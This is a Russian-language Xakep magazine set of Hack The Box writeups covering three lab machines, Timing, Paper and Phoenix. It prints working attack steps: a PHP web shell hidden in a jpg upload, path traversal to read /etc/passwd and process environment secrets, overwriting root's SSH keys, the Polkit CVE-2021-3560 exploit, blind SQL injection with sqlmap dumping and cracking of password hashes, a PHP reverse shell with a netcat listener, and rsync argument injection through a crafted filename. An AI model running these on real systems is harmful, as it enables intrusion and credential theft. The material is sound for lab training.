книги хакеры / журнал хакер / xa-279_Optimized

ПЕНТЕСТИМ ВЕБ-СЕРВЕР НА PHP

Видим­ , что в обработ­ чике­ на один параметр больше­ , чем отправляет­ ся­ через форму­ . Значит­ , мы можем добавить role и задать любую роль. Это должно­ дать нам привиле­ гиро­ ван­ ный­ контекст­ .

Новый­ запрос­

Ответ­ сервера­

В итоге­ мы получаем­ ответ со всеми­ перечисленны­ ми­ параметрами­ , а на самой странице­ появляет­ ся­ ссылка­ на панель админис­ тра­ тора­ .

Главная­ страница­ админис­ тра­ тора­

ТОЧКА ОПОРЫ

С панели админис­ ­тра­тора нам открывает­ ­ся функция­ загрузки­ аватара­ .

Форма­ загрузки­ файла­

Мы знаем­ , что это должен­ быть файл с расширени­ ем­ jpg. Но вот только­ его содержимое­ не проверя­ ется­ , поэтому­ мы можем записать туда код на PHP и затем попробовать­ выполнить­ . Запишем следующий­ простой­ PHP-шелл, выполняющий­ принятую­ команду­ , и загрузим­ файл на сервер­ .

echo '<?php echo system($_GET["cmd"]);?>' > test.jpg0

Сообще­ ние­ о загрузке­ файла­

Файл успешно загружен­ , теперь определим­ ся­ с именем­ , под которым он сох ­ ранился­ на сервере­ . Для этого­ вспомним­ принцип­ , по которому­ он формиру­ ­ ется.

Код формирова­ ния­ имени­ загружен­ ного­ файла­

Единствен­ ­ная переменная­ , которую нам осталось­ получить, — значение­ фун ­ кции time(). Эта функция­ возвра­ ­щает количество­ секунд, прошед­ ­ших с 00:00:00 01.01.1970. И если мы знаем­ время­ загрузки­ файла­ , установ­ ­ ленное на сервере­ , мы сможем­ получить это значение­ . Так как вся работа выполняет­ ­ся через Burp, в истории­ запросов­ найдем­ HTTP-заголовок­ ответа­ сервера­ . В заголовке­ Date будет указано­ нужное­ нам время­ .

HTTP-заголовок­ ответа­ сервера­ при загрузке­ файла­

Теперь­ мы можем получить значение­ MD5 от сложения­ всех строк:

echo md5('$file_hash' . strtotime("Wed, 05 Jan 2022 13:19:51 GMT"));

Расчет­ первой­ части­ имени­ файла­ Нам нужно­ обращать­ ­ся к файлу­ вот с таким именем­ :

e3879d6c6425db4ad6e139681d11693d_test.jpg0

Попробу­ ем­ с помощью нашего хеша выполнить­ базовую команду­ id.

curl 'http://timing.htb/image.php?img=images/uploads/

e3879d6c6425db4ad6e139681d11693d_test.jpg&cmd=id'

Выпол­ нение­ команды­ id

Коман­ да­ успешно выполнена­ , что означает­ получение­ доступа­ к хосту­ .

ПРОДВИЖЕНИЕ

Для дальнейше­ ­го продвижения­ нам необходимо­ найти­ учетные­ данные­ . Для этого­ предсто­ ­ит изучить­ файлы­ в каталоге­ веб сервера­ , всевоз­ ­можные резервные­ копии и другие­ пользователь­ ­ские файлы­ . Так находим бэкапы исходников­ в каталоге­ /opt.

Содер­ жимое­ каталога­ /opt

Копиру­ ем­ архив в каталог веб сервера­ и легко­ скачива­ ем­ через браузер­ .

curl 'http://timing.htb/image.php?img=images/uploads/

e3879d6c6425db4ad6e139681d11693d_test.jpg&cmd=cp+/opt/

source-files-backup.zip+./'

Скачива­ ние­ исходных кодов через браузер­

В архиве­ присутс­ тву­ ет­ каталог с расширени­ ем­ git. Это позволит­ нам получить доступ­ к истории­ изменений­ файлов­ .

Содер­ жимое­ архива­

Для удобной­ работы с репозитори­ ями­ Git можно­ использовать­ графичес­ кий­ просмот­ рщик­ gitk. Он помог найти­ изменение­ пароля для подклю­ чения­ к базе данных­ .

Изменение­ в файле­ db_conn.php

А вот уже с этим паролем удается­ подклю­ чить­ ся­ по SSH и забрать­ первый­ флаг.

Флаг пользовате­ ля­

ЛОКАЛЬНОЕ ПОВЫШЕНИЕ ПРИВИЛЕГИЙ

Первым­ делом проверя­ ­ем наиболее­ вероятные­ места­ повышения­ привиле­ ­ гий: настрой­ ­ки sudoers, приложе­ ­ния с выставлен­ ­ным битом SUID, прос ­ лушиваемые­ на локалхосте­ порты­ . Проверим­ sudoers командой­ sudo -l.

Настрой­ ки­ судоера­

В настрой­ ­ках прописан­ привиле­ ­гиро­ван­ный запуск /usr/bin/netutils без ввода­ пароля (NOPASSWD). Просмотрим­ тип файла­ .

Определе­ ние­ типа файла­ /usr/bin/netutils

Это обычный­ скрипт. Давай глянем­ на его содержимое­ .

Содер­ ­жимое файла­ /usr/bin/netutils

Это пользователь­ ­ское приложе­ ­ние на Java. Но так как оно расположе­ ­но в каталоге­ рута, мы не можем получить доступ­ к самому файлу­ и деком ­ пилировать­ его, чтобы­ изучить­ . Тогда­ давай хотя бы запустим­ программу­ и посмотрим­ , как она работает­ .

Меню­ приложе­ ния­

Нам предлага­ ют­ выбрать­ одну из опций: FTP или HTTP. После­ чего с указан­ ­ ного ресурса­ загружа­ ется­ файл.

Сообще­ ние­ о загрузке­ файла­

Посмотрим­ , что происхо­ дит­ с процес­ сами­ в системе­ при выполнении­ этого­ приложе­ ния­ . Для отслежива­ ния­ процес­ сов­ будем использовать­ pspy64. Заг ­ рузим его на хост:

scp ./pspy64 aaron@timing.htb:/tmp/0

И выполним­ . В выводе видим запуск скрипта­ , но, что более интерес­ ­но, после­ указания­ адреса­ для загрузки­ использует­ ­ся программа­ axel в контек­ ­сте пользовате­ ­ля с UID=0, а это пользователь­ root.

Логи­ pspy

Я сразу­ попробовал­ выполнить­ инъекцию­ команды­ ОС, но это ничего не дало.

Тестирова­ ние­ OS Command Injection

Однако­ мы можем конфигури­ ровать­ axel и управлять некоторыми­ его параметрами­ , к примеру­ именем­ файла­ и каталогом­ для его сохранения­ . Недолго­ размышляя­ , пробуем­ сохранить­ файл как публичный­ SSH-ключ поль ­ зователя­ root. Для этого­ в домашнем­ каталоге­ текущего­ пользовате­ ля­ сох ­ раним файл .axelrc со следующим­ содержимым­ :

default_filename = /root/.ssh/authorized_keys0

Файл конфигура­ ций­ axel

На локальном­ хосте­ сгенери­ руем­ пару ключей­ (ssh-keygen) и переиме­ нуем­ публичный­ , чтобы­ он назывался­ index.html. Запустим­ простой­ веб сервер­ на Python:

python3 -m http.server 800

А затем обратим­ ся­ к нему из тестиру­ емо­ го­ приложе­ ния­ .

Запись­ SSH-ключа­

Видим­ сообщение­ с именем­ сохранен­ ного­ файла­ , пробуем­ подклю­ чить­ ся­ с закрытым­ ключом­ и получаем­ контроль­ над хостом­ .

Флаг рута

Машина­ захвачена­ , и у нас есть флаг рута.

ПЕНТЕСТИМ WORDPRESS

И ЭКСПЛУАТИРУЕМ БАГ В POLKIT

Подклю­ чать­ ся­ к машинам с HTB рекомендует­ ся­ только­ через VPN. Не делай этого­ с компьюте­ ров­ , где есть важные­ для тебя данные­ , так как ты ока ­ жешься­ в общей сети с другими­ участни­ ками­ .

РАЗВЕДКА Сканирование портов

Добав­ ­ляем IP-адрес машины в /etc/hosts:

10.10.11.143 paper.htb

И запускаем­ сканиро­ вание­ портов­ .

Сканиро­ ­вание портов­ — стандар­ ­тный первый­ шаг при любой атаке­ . Он поз ­ воляет­ атакующе­ ­му узнать, какие службы­ на хосте­ принима­ ­ют соединение­ . На основе­ этой информации­ выбирается­ следующий­ шаг к получению­ точки­ входа­ .

Наибо­ ­лее известный­ инстру­ ­мент для сканиро­ ­вания — это Nmap. Улучшить­ результаты­ его работы ты можешь при помощи следующе­ ­го скрипта­ .

#!/bin/bash

ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 |

tr '\n' ',' | sed s/,$//)

nmap -p$ports -A $1

Он действу­ ет­ в два этапа­ . На первом­ произво­ дит­ ся­ обычное­ быстрое­ ска ­ нирование­ , на втором­ — более тщатель­ ное­ сканиро­ вание­ , с использовани­ ем­ имеющих­ ся­ скриптов­ (опция -A).

Резуль­ тат­ работы скрипта­

Скрипт нашел три открытых­ порта­ : 22 — служба­ OpenSSH 8.0, 80 и 443 — веб сервер­ Apache 2.4.37. Обычно­ в SSL-сертифика­ те­ можно­ подсмот­ реть­ новые доменные­ имена­ в поле commonName, но не в этот раз.

Главная­ страница­ сайта­

ТОЧКА ВХОДА

При пентесте­ веб сервисов­ лучше­ всего­ работать в Burp. Полезно­ , к при ­ меру, что в Burp History можно­ будет просмотреть­ всю цепочку­ пользователь­ ­ ских запросов­ и ответов­ сервера­ . Так, в HTTP-заголовке­ X-Backend-Server находим еще один домен — office.paper.

Запросы­ в Burp History

Тоже­ добавляем­ его в /etc/hosts.

10.10.11.143 paper.htb office.paper

И на этом домене находим новый сайт.

Главная­ страница­ ofce.paper

И снова­ Burp History нам помогает­ — по страницам­ , к которым обращает­ ся­ наш клиент­ , мы определя­ ем­ , что на машине установ­ лен­ WordPress.

Запросы­ в Burp History

ТОЧКА ОПОРЫ

WordPress

На сайте­ несколь­ ­ко статей­ с коммента­ ­риями, которые мы можем прочитать­ . И один из комменти­ ­рующих указыва­ ­ет, что в черновиках­ лежат какие то сек ­ ретные данные­ .

Коммента­ рий­ с сайта­

Посколь­ ­ку мы столкну­ ­лись с WordPress, можем восполь­ ­зовать­ся специаль­ ­ ными утилита­ ­ми для работы с ней. В первую­ очередь­ нам понадобит­ ­ся WPScan — сканер­ , который автомати­ ­чес­ки ищет уязвимос­ ­ти в WordPress и установ­ ­ленных плагинах­ .

Переда­ ­дим сканеру­ следующие­ параметры­ :

•--url — URL;

•-e ap — поиск установ­ ­ленных плагинов­ ;

•--plugins-detection — способ­ определе­ ­ния плагина­ . Aggressive — грубое­ сканиро­ ­вание перебором­ ;

•-t — количество­ потоков;

•--api-token — полученный­ с официаль­ ­ного сайта­ API-ключ.

wpscan --url http://office.paper -e ap --plugins-detection

aggressive -t 256 --api-token [...KEY...]0

			Обнаружен­			ные­	уязвимос­	ти­ WordPress
И мы находим уязвимость­				,	которая позволя­				ет­ читать приват­ ные­		посты­ .
По предос­ тавлен­	ной­ утилитой­				ссылке­ мы получим инструк­ цию­ , как эксплу­ ати­ ­
ровать уязвимость­			.

Описание­ обнаружен­ ­ной уязвимос­ ­ти

Перехо­ дим­ к странице­ /?static=1, и нам становит­ ­ся доступным­ скрытый­ пост.

Содер­ жимое­ скрытого­ поста­

Находим­ ссылку­ на еще один домен. Добавим его в /etc/hosts и прос мотрим в браузе­ ­ре.

10.10.11.143 paper.htb office.paper chat.office.paper

Панель­ регистра­ ции­ Rocket.Chat

Так мы получаем­ доступ­ к панели регистра­ ции­ в Rocket.Chat!

Rocket.Chat

Rocket.Chat — это полностью­ настра­ ­иваемый мессен­ ­джер на JavaScript c открытым­ исходным кодом. Так как мы получили­ доступ­ к странице­ регистра­ ­ ции, то создадим­ себе аккаунт­ и авторизу­ ­емся.

Главная­ панель Rocket.Chat

Но мы получаем­ пустой­ мессен­ джер­ , поэтому­ идея узнать приват­ ные­ данные­ из переписок­ сразу­ отпала­ . Однако­ спустя­ минуту приходит­ сообщение­ от бота!

Входящие­ сообщения­ Rocket.Chat

В расска­ зе­ о себе и своих­ функци­ ях­ бот упомина­ ет­ возможность­ прочитать­ файл из хранили­ ща­ .

			Возможнос­		ти­ бота
Пытаем­	ся­ получить вымышленный­			файл, и бот выдает­ нам полный­				путь
к предполага­		емо­ му­ файлу­ . И это обычный­ системный­					каталог.

recyclops file test.txt0

Ошибка­ чтения­ файла­

Так как бот просто­ пытается­ прочитать­ файл на диске­ , мы можем попробовать­ проэкс­ плу­ ати­ ровать­ уязвимость­ обхода­ каталога­ и прочитать­ любой другой­ файл на сервере­ , к примеру­ /etc/passwd.

recyclops file ../../../../../../etc/passwd0

Содер­ жимое­ файла­ /etc/passwd

И мы получаем­ содержимое­ указан­ ного­ файла­ ! В подобных­ случаях­ мы уже должны­ знать, какие файлы­ в системе­ наиболее­ интерес­ ны­ . Первым­ делом я попытался­ прочитать­ приват­ ный­ ключ SSH пользовате­ ля­ dwight.

recyclops file ../../../../../../home/dwight/.ssh/id_rsa0

Ошибка­ чтения­ файлов­

Такого­ файла­ в системе­ нет, но зато нам повезло­ с файлом­ , содержащим­ переменные­ среды­ выполнения­ (окружения­ ) процес­ са­ .

recyclops file ../../../../../../proc/self/environ0

Содер­ жимое­ файла­ /proc/self/environ

Среди­ переменных­ окружения­ есть логин и пароль, который также­ подходит­ для службы­ SSH. Логинимся­ и забираем­ флаг пользовате­ ля­ .

Флаг пользовате­ ля­

ЛОКАЛЬНОЕ ПОВЫШЕНИЕ ПРИВИЛЕГИЙ

Пути­ для дальнейше­ ­го продвижения­ поищем при помощи PEASS.

Что делать после­ того, как мы получили­ доступ­ в систему­ от имени­ поль ­ зователя­ ? Вариантов­ дальнейшей­ эксплу­ ата­ ции­ и повышения­ привиле­ гий­ может быть очень много­ , как в Linux, так и в Windows. Чтобы­ собрать­ информацию­ и наметить цели, можно­ использовать­ Privilege Escalation Awesome Scripts SUITE (PEASS) — набор скриптов­ , которые проверя­ ют­ сис ­

тему на автомате­ .

Загружа­ ем­ на хост это чудесное­ средство­ и выполняем­ . И сразу­ же нам сооб ­ щают об автомати­ чес­ ки­ найден­ ной­ уязвимос­ ти­ CVE-2021-3560.

Вывод­ LinPEAS

Экспло­ ­итов на GitHub много­ , для их поиска­ достаточ­ ­но просто­ указать­ номер

CVE.

Поиск­ экспло­ итов­ в Google

Для понимания­ уязвимос­ ти­ нужно­ знать, что такое Polkit. Polkit (PolicyKit) — библиоте­ ка­ для UNIX-подобных­ операци­ онных­ систем­ , позволя­ ет­ предос­ ­ тавить непривиле­ гиро­ ван­ ным­ процес­ сам­ возможность­ выполнять­ привиле­ ­ гирован­ ные­ операции­ . Polkit можно­ использовать­ вместо­ sudo, но в отличие­

от sudo Polkit не наделяет­ процесс­ пользовате­ ля­ повышенными­ правами­ , а позволя­ ет­ точно­ контро­ лиро­ вать­ , что разрешено­ , а что запрещено­ . Эта библиоте­ ка­ использует­ ся­ утилитой­ systemd, а значит­ , и установ­ лена­ по умол ­ чанию во многих­ дистри­ бути­ вах­ Linux.

Суть уязвимос­ ­ти в том, что Polkit можно­ заставить­ обходить­ провер­ ­ки учет ­ ных данных­ для запросов­ D-Bus, повышая привиле­ ­гии до пользовате­ ­ля root. Эту уязвимость­ можно­ эксплу­ ­ати­ровать от имени­ локального­ пользовате­ ­ля, например­ создать­ нового привиле­ ­гиро­ван­ного пользовате­ ­ля. Но чтобы­ понять архитек­ ­туру уязвимос­ ­ти, нужно­ разобрать­ связь между­ Polkit и D-Bus.

Как работает Polkit

Как создает­ ­ся новый пользователь­ через Polkit, изображено­ на схеме­ ниже. Два процес­ ­са над пунктир­ ­ной линией­ работают­ в непривиле­ ­гиро­ван­ном режиме.

Схема­ взаимо­ дей­ ствия­ D-Bus и Polkit

1.Процесс­ dbus-send дает сигнал­ о создании­ нового пользовате­ ­ля про ­

цессу­ accounts-daemon.

2. Процесс­ accounts-daemon получает­ сигнал­ через dbus-daemon. При этом dbus-daemon прикрепит­ к сигналу­ имя шины.

3.В свою очередь­ , account-daemon запрашива­ ­ет у polkit, разрешено­ ли соединение­ c данной­ шиной для создания­ нового пользовате­ ­ля.

4.Для определе­ ­ния polkit запрашива­ ­ет у dbus-daemon UID для коннекта­ .

5.Если­ UID равен 0 (root), polkit авторизу­ ­ет запрос­ . Иначе­ polkit отправ ­ ляет агенту­ аутентифика­ ­ции список­ пользовате­ ­лей, которым разрешено­ авторизо­ ­вать запрос­ .

6.Агент аутентифика­ ­ции отобразит­ пользовате­ ­лю диалоговое­ окно для вво ­ да пароля, который потом отправит­ polkit.

7. Если­ polkit все же авторизу­	ет­ этот запрос­ , он отправит­			сигнал­
к accounts-daemon, а тот уже создаст­		нового пользовате­	ля­ .

Уязвимость в схеме работы Polkit

Уязвимость­ находится­ на четвертом­ этапе­ последова­ ­тель­нос­ти. Когда­ Polkit запрашива­ ­ет у dbus-daemon UID коннекта­ , а этого­ коннекта­ больше­ не сущес ­ твует­ , dbus-daemon правиль­ ­но обрабаты­ ­вает эту ситуацию­ и возвра­ ­щает ошибку­ . Но оказалось­ , что Polkit неправиль­ ­но ее обрабаты­ ­вает! Вместо­ того чтобы­ отклонить­ запрос­ , Polkit поступа­ ­ет так, как если бы он исходил­ от про ­ цесса­ с UID, равным­ 0, то есть немедленно­ авторизу­ ­ет.

Эксплуатация уязвимости Polkit

Таким­ образом­ , нам нужно­ запустить­ dbus-send и уничтожить­ его, пока Polkit все еще обрабаты­ ­вает запрос­ . Но оказалось­ , что Polkit запрашива­ ­ет у dbusdaemon UID процес­ ­са несколь­ ­ко раз по разным­ путям. Большинс­ ­тво из этих путей правиль­ ­но обрабаты­ ­вают ошибку­ , но один из них — нет! Если убить dbus-send досрочно­ , то команда­ будет обработа­ ­на одним из «правиль­ ­ных» путей и запрос­ будет отклонен­ . Чтобы­ активиро­ ­вать уязвимый­ путь, надо завершить­ процесс­ в нужный­ момент. Поэтому­ последова­ ­тель­ность действий­ требует­ ­ся выполнить­ несколь­ ­ко раз.

Все это уже реализова­ но­ в коде­ экспло­ ита­ . Нужно­ лишь запустить­ файл и дождать­ ся­ привиле­ гиро­ ван­ ного­ контек­ ста­ .

Мы получаем­ привиле­ ­гии рута и забираем­ флаг.

Флаг рута

Машина­ захвачена­ !

ЛОМАЕМ САЙТ НА WORDPRESS

В ОБХОД WAF

Подклю­ чать­ ся­ к машинам с HTB рекомендует­ ся­ только­ через VPN. Не делай этого­ с компьюте­ ров­ , где есть важные­ для тебя данные­ , так как ты ока ­ жешься­ в общей сети с другими­ участни­ ками­ .

РАЗВЕДКА

Добав­ ­ляем IP виртуал­ ­ки в /etc/hosts:

10.10.11.149 phoenix.htb0

И запускаем­ сканиро­ вание­ портов­ .

Сканиро­ ­вание портов­ — стандар­ ­тный первый­ шаг при любой атаке­ . Он поз ­ воляет­ атакующе­ ­му узнать, какие службы­ на хосте­ принима­ ­ют соединение­ . На основе­ этой информации­ выбирается­ следующий­ шаг к получению­ точки­ входа­ .

Наибо­ ­лее известный­ инстру­ ­мент для сканиро­ ­вания — это Nmap. Улучшить­ результаты­ его работы ты можешь при помощи следующе­ ­го скрипта­ .

#!/bin/bash

ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 |

tr '\n' ',' | sed s/,$//)

nmap -p$ports -A $1

Он действу­ ет­ в два этапа­ . На первом­ произво­ дит­ ся­ обычное­ быстрое­ ска ­ нирование­ , на втором­ — более тщатель­ ное­ сканиро­ вание­ , с использовани­ ем­ имеющих­ ся­ скриптов­ (опция -A).

Резуль­ тат­ работы скрипта­

Нашли­ три открытых­ порта­ : 22 — служба­ OpenSSH 8.2p1, 80 и 443 — веб сер ­ вер Apache. Nmap отобразил­ для нас поле commonName из сертифика­ та­ на 443-м порте­ , но указан­ ный­ там домен нам уже известен.

Главная­ страница­ сайта­ phoenix.htb

Захожу­ на сайт, и плагин­ Wappalyzer тут же сообщает­ , что использует­ ­ся WordPress. Поэтому­ сразу­ запустим­ сканер­ WPScan с полным­ перебором­ (параметр --plugins-detection) установ­ ­ленных плагинов­ (параметр -e ap) в 256 потоков (параметр -t). Для автомати­ ­чес­кого определе­ ­ния уязвимос­ ­тей можно­ получить на сайте­ API-токен и указать­ его приложе­ ­нию (это бесплат­ ­ но). И чтобы­ нам не вернули­ ошибку­ провер­ ­ки сертифика­ ­та, отказыва­ ­емся от самой провер­ ­ки (--disable-tls-checks).

wpscan --url https://phoenix.htb/ -e ap --plugins-detection

aggressive -t 256 --api-token

KEDNckD8h7Ahn3WzqoSaxy1xa6RuLmx0nCl97cO83Dw --disable-tls-checks

Резуль­ тат­ работы WPScan

Но WPScan, что удивитель­ но­ , ничего не нашел. А вот сайт стал выдавать нам код 403 вместо­ ответов­ .

Ответ­ сайта­

Это явный признак­ того, что тут работает­ Web Application Firewall (WAF).

ТОЧКА ВХОДА

Давай­ снова­ запустим­ WPScan — без агрессивного­ сканиро­ ­вания. По умол ­ чанию он переберет­ самые популярные­ плагины­ .

wpscan --url https://phoenix.htb/ --api-token

KEDNckD8h7Ahn3WzqoSaxy1xa6RuLmx0nCl97cO83Dw --disable-tls-checks

Резуль­ тат­ сканиро­ вания­ WPScan

Мы нашли­ несколь­ ­ко уязвимос­ ­тей в плагине­ Asgaros Forum.

И еще обязатель­ ­но просканиру­ ­ем каталоги­ . Так как каталоги­ в списке­ отсортирова­ ­ны по популярности­ и использует­ ­ся популярная­ CMS, то, скорее­ всего­ , самые важные­ каталоги­ мы найдем­ еще до блокиров­ ­ки. Для сканиро­ ­ вания используем­ легкий­ , но очень быстрый­ ffuf.

ffuf -u https://phoenix.htb/FUZZ -t 256 -w directory_2.3_medium_

lowercase.txt0

Резуль­ тат­ сканиро­ вания­ каталогов­

Присутс­ тву­ ет­ каталог /forum — видимо, это то, что мы искали­ .

Страница­ forum

WPScan не только­ сканиру­ ет­ и определя­ ет­ уязвимость­ , но и предос­ тавля­ ет­ инструк­ цию­ по ее эксплу­ ата­ ции­ . Из уязвимос­ тей­ наиболее­ привлекатель­ на­ SQL-инъекция­ без авториза­ ции­ .

Детали­ уязвимос­ ти­ Asgaros Forum

Для подтвержде­ ния­ уязвимос­ ти­ нужно­ сделать­ всего­ один запрос­ . Обра ­ щаемся­ к странице­ forum через Burp Repeater и добавляем­ параметр

?subscribe_topic=1%20union%20select%201%20and%20sleep(10)0

Если­ уязвимость­ сработа­ ­ет, то сервер­ будет отвечать­ больше­ 10 с. Это под ­

тверждает­ Repeater.

Время­ ответа­ сервера­ в Burp Repeater

Уязвимость­ подтвержде­ на­ , переходим­ к эксплу­ ата­ ции­ .

Продолжение статьи0 →

ТОЧКА ОПОРЫ

Получение учетных данных WordPress

Это time-based «слепая­ » инъекция­ , то есть мы не получаем­ данные­ из таб ­ лицы в явном виде, а делаем­ вывод на основании­ выполнения­ определен­ ного­ условия­ — в данном­ случае­ времени­ обработ­ ки­ запроса­ . Когда­ встречаешь­ ся­ с инъекци­ ями­ такого типа, удобнее­ всего­ пользовать­ ся­ автомати­ зиро­ ван­ ным­ средством­ эксплу­ ата­ ции­ . Нас в этом случае­ выручит sqlmap.

После­ первого­ запуска­ sqlmap подтвер­ дил­ наличие уязвимос­ ти­ и сфор ­ мировал нагрузку­ . Мы можем сузить круг поиска­ уязвимого­ параметра­ , задав опцию -p. Также­ выставим­ самый тяжелый уровень­ нагрузок­ опцией­ --risk, ну и если у sqlmap будут к нам вопросы­ , пусть выбирает­ самый приори­ тет­ ный­

(опция --batch).

sqlmap --url 'https://phoenix.htb/forum/?subscribe_topic=1' -p

subscribe_topic --risk 3 --batch

Резуль­ ­тат сканиро­ ­вания sqlmap

После­ того как нагрузка­ составле­ ­на, получим имена­ и хеши паролей поль ­ зователей­ . В WordPress все всегда­ стандар­ ­тно: таблица­ wp_users, столбцы­

user_login и user_pass.

Задаем­ sqlmap новые параметры­ : база (-D), таблица­ (-T), названия­ стол ­ бцов (-C) и команда­ --dump для получения­ данных­ .

sqlmap --url 'https://phoenix.htb/forum/?subscribe_topic=1' -p

subscribe_topic --risk 3 -D wordpress -T wp_users --dump --batch

Получе­ ние­ данных­ с помощью sqlmap

У нас есть хеши — ломаем­ их! Но сначала­ узнаем­ режим hashcat, распарсив­ справку­ .

hashcat --example | grep -A2 -B2 '\$P\$'

Справка­ hashcat

Получен­ ­ный режим указыва­ ­ем в параметре­ -m. У меня ушло около­ часа для полного­ перебора­ , но получаем­ три пароля.

hashcat -m 400 -a 0 hashes.txt rockyou.txt0

Резуль­ тат­ перебора­ хешей с помощью hashcat

Никакие­ из полученных­ учетных­ данных­ не подходят­ к SSH, а WordPress вооб ­ ще использует­ двухфактор­ ную­ аутентифика­ цию­ .

Форма­ провер­ ки­ OTP при аутентифика­ ции­ в WordPress

Получение активных плагинов WordPress

Здесь я долго­ думал, что делать дальше­ , но в итоге­ вспомнил­ , что прос ­ мотреть все плагины­ нам помешал WAF. Зато теперь то мы можем узнать их названия­ , прочитав­ столбец­ option_value таблицы­ wp_options. Составим­ запрос­ так, чтобы­ в вывод попали только­ активные плагины­ .

sqlmap --url 'https://phoenix.htb/forum/?subscribe_topic=1' -p

subscribe_topic --risk 3 -D wordpress -T wp_options -C option_value

--where "option_name='active_plugins'" --dump --batch

Список­ активных плагинов­

В списке­ присутс­ тву­ ет­ уязвимый­ плагин­ Download from fles, для которого­ есть экспло­ ит­ , позволя­ ющий­ загружать­ на сервер­ файлы­ .

Описание­ уязвимос­ ти­ Download from fles

С помощью этого­ экспло­ ита­ мы загрузим­ на сервер­ популяр­ ный­ реверс шелл на PHP. В этой нагрузке­ нужно­ указать­ адрес и порт своего­ хоста­ для подклю­ ­ чения. Не забываем­ запустить­ листенер­ :

rlwrap -cAr nc -lvp 43210

Изменен­ ный­ код реверс шелла­

Но при эксплу­ ата­ ции­ уязвимос­ ти­ получим сообщение­ с ошибкой­ провер­ ­ки сертифика­ та­ .

python3 50287.py https://phoenix.htb shell.phtml0

Ошибка­ при выполнении­ экспло­ ита­

В каждый­ запрос­ в исходниках­ экспло­ ­ита добавим опцию verify=False, которая должна­ отключить­ провер­ ­ку SSL-сертифика­ ­та.

Изменение­ кода экспло­ ита­

Изменение­ кода экспло­ ита­

Теперь­ повторно­ выполняем­ экспло­ ит­ и получаем­ сообщение­ , что файл успешно загружен­ .

python3 50287.py https://phoenix.htb shell.phtml0

Сообще­ ние­ о загрузке­ файла­

Нам осталось­ обратить­ ся­ по указан­ ной­ ссылке­ , и мы получим бэкконнект­ на свой листенер­ .

curl -k https://phoenix.htb/wp-admin/shell.phtml0

Получе­ ние­ удален­ ной­ сессии­

Мы получили­ доступ­ к системе­ .

ПРОДВИЖЕНИЕ

Так как на хосте­ развернут­ веб сервер­ , а на нем работает­ целая CMS, первое­ наше действие­ — попробовать­ получить какие нибудь учетные­ данные­ поль ­ зователей­ . Высока вероятность­ , что эти учетки­ подойдут­ и для локальных­ пользовате­ лей­ тоже. В случае­ с WordPress есть место­ , где учетные­ данные­ найдут­ ся­ всегда­ , — файл с настрой­ ками­ для подклю­ чения­ к базе данных­ wpconfig.php. Найдем­ этот файл и просмотрим­ его содержимое­ .

find ./ -name wp-config.php 2>/dev/null0

Поиск­ файла­ wp-confg.php

Содер­ жимое­ файла­ wp-confg.php

Получа­ ем­ еще один пароль. Теперь узнаем­ активных пользовате­ лей­ из файла­ /etc/passwd и проверим­ , не подойдет­ ли для доступа­ по SSH какая нибудь комбинация­ из полученных­ нами логинов и паролей.

Содер­ жимое­

файла­ /etc/passwd

Нам нужен пользователь­

editor,

но авторизо­

вать­ ся­ от

его имени­

никак

не получалось­

. Это было очень подозритель­

но­ , поэтому­ я решил просмотреть­

возможные­

настрой­

ки­ авториза­

ции­ . Разгадка­

нашлась­

в файле­

/etc/

security/access-local.conf. Он содержит­ правила­

, определя­

ющие­

, каким

пользовате­

лям­ и с каких адресов­ разрешен­

вход.

Содер­ жимое­ файла­ access-local.conf

Стоит­ запрет­ авториза­ ции­ для всех адресов­ , кроме­ 10.11.12.13. А это наш второй­ адрес!

Резуль­ тат­ команды­ ipconfg

Нам нужно­ туннелиро­ вать­ трафик­ , чтобы­ подклю­ чить­ ся­ по SSH. Для тун ­ нелирования­ будем использовать­ chisel. Загружа­ ем­ один и тот же файл на локальный­ и удален­ ный­ хост. А затем активиру­ ем­ на локальном­ хосте­ сер ­ вер со следующи­ ми­ параметрами­ : порт (-p), опция ожидания­ подклю­ чения­ (- -reverse) и тип прокси­ .

./chisel.bin server -p 5432 --reverse --socks5

Логи­ сервера­ chisel

Подклю­ ­чаем­ся с удален­ ­ного хоста­ . Указыва­ ­ем адрес и порт сервера­ , а также­ правила­ ретран­ ­сля­ции трафика­ : с удален­ ­ного порта­ 2222 на порт 22 хос ­

та 10.11.12.13.

./chisel.bin client 10.10.14.60:5432 R:2222:10.11.12.13:220

			Логи­ клиента­		chisel
В логах серверной­		части­ должна­		появиться­ информация­			о подклю­ чении­
и создании­	новой сессии­ .

Логи­ сервера­ chisel

Теперь­ весь трафик­ с порта­ 2222 нашего локального­ хоста­ будет ретран­ ­сли ­ рован на порт 22 хоста­ 10.11.12.13. Выполним­ подбор­ пароля с помощью

CrackMapExec.

crackmapexec ssh 127.0.0.1 --port 2222 -u editor -p passwords.txt0

Резуль­ тат­ брута­ паролей

И один из паролей подошел, поэтому­ мы можем авторизо­ ­вать­ся на хосте­ и получить стабиль­ ­ную сессию­ .

ssh -p2222 editor@127.0.0.10

Флаг пользовате­ ля­

ЛОКАЛЬНОЕ ПОВЫШЕНИЕ ПРИВИЛЕГИЙ

Осматри­ ­ваем­ся на хосте­ и находим исполняемый­ файл cron.sh.x.

Разрешения­ файла­

Запус­ ­тим файл под ltrace, чтобы­ посмотреть­ функции­ , которые он исполь ­ зует.

Трассиров­ ка­ файла­

Видим­ несколь­ ко­ вызовов функции­ exec. Это значит­ , что файл выполняет­ в консоли­ еще какие то команды­ . Чтобы­ узнать какие, используем­ pspy64.

Логи­ pspy64

В логах pspy видим запуск mysqldump, tar, gzip и других­ утилит­ . Среди­ них

есть и rsync, для которой сущес­ тву­ ет­ техника­

GTFOBins.

В команду­ rsync будут вставлены­

все файлы­ из каталога­ /backup, но, если

мы можем использовать­

«ненормаль­

ное­ »

имя

файла­

-e

test.test,

при вставке­ этой строки­ в команду­ rsync она будет воспри­ нимать­

ся­ не как имя

файла­ , а как параметр -e и его значение­

test.test, что приведет­

к выпол ­

нению файла­ test.test. Таким способом­

передадим­

для

выполнения­

скрипт, который назначит­

бит SUID на файл командной­

оболоч­ ки­ /bin/bash,

чтобы­ мы могли­ его запустить­

от имени­ пользовате­

ля­

root.

echo "chmod u+sx /bin/bash" > ralf.expl0

chmod +x ralf.expl0

touch -- "-e sh ralf.expl"

